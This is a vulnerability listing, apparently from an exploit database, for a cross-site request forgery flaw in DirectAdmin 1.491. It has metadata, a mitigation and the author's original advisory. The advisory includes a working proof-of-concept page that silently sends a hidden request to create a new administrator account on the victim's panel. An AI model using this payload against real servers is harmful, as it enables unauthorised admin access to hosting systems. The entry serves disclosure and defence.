DirectAdmin (1.491) CSRF Vulnerability

vendor:

DirectAdmin

by:

Necmettin COSKUN

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: DirectAdmin

Affected Version From: >=1.491

Affected Version To: >=1.491

Patch Exists: YES

Related CWE: N/A

CPE: a:directadmin:directadmin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014, 2016

DirectAdmin (1.491) CSRF Vulnerability

DirectAdmin is a web-based hosting control panel. As seen in the code, the original form does not include CSRF protection or any secret token. An attacker can craft a malicious HTML page that contains a form with hidden fields that can be used to submit a request to the vulnerable application. This can be used to create a new user account with administrative privileges.

Mitigation:

Implement CSRF protection tokens in the application and verify the token before processing the request.

Source

Exploit-DB raw data:


=============================================================================
# Title   : DirectAdmin (1.491) CSRF Vulnerability 
# Date    : 27-10-2014 updated 18-02-2016
# Version : >=1.491 
# Author  : Necmettin COSKUN =>@babayarisi
# Blog    :http://ha.cker.io
# Vendor  : http://www.directadmin.com/
# Download: http://www.directadmin.com/demo.html
=============================================================================
# info : DirectAdmin is a web-based hosting control panel.

#As you can see original form doesn't include csrf protection or any secret token.
<form name=reseller action="CMD_ACCOUNT_ADMIN" method="post" onSubmit="return formOK()">
<input type=hidden name=action value=create>
<tr><td class=list>Username:</td><td class=list><input type=text name=username maxlength=12 onChange="checkName()"></td></tr>
<tr><td class=list>E-Mail:</td><td class=list><input type=text name=email onChange="checkEmail()"></td></tr>
<tr><td class=list>Enter Password:</td><td class=list><input type=password name=passwd> <input type=button value="Random" onClick="randomPass()"></td></tr>
<tr><td class=list>Re-Enter Password:</td><td class=list><input type=password name=passwd2 onChange="checkPass()"></td></tr>
<tr><td class=list>Send Email Notification:</td><td class=list><input type=checkbox value="yes" name=notify checked> <a href="javascript:showAdminMessage();">Edit Admin Message</a></td></tr>

<tr><td td class=listtitle colspan=3 align=right>
<input type=submit value="Submit">
</td></tr>
</form>

#POC
<html>
<head>
<title>POC</title>
</head>
<script language="javascript">

function yurudi(){
var adress  ="www.demo.com";
var username="demo";
var email   ="demo@demo.com";
var password="12345";
var urlson="https://"+adress+":2222/CMD_ACCOUNT_ADMIN?action=create&username="+username+"&email="+email+"&passwd="+password+"&passwd2="+password;

document.getElementById("resim").src=urlson;
}
</script>

<body onload="yurudi()">
<img id="resim" src="" style="height:0px;width:0px;"></img>
</body>
</html>
#POC

# don't be evil!
Discovered by:
================
Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!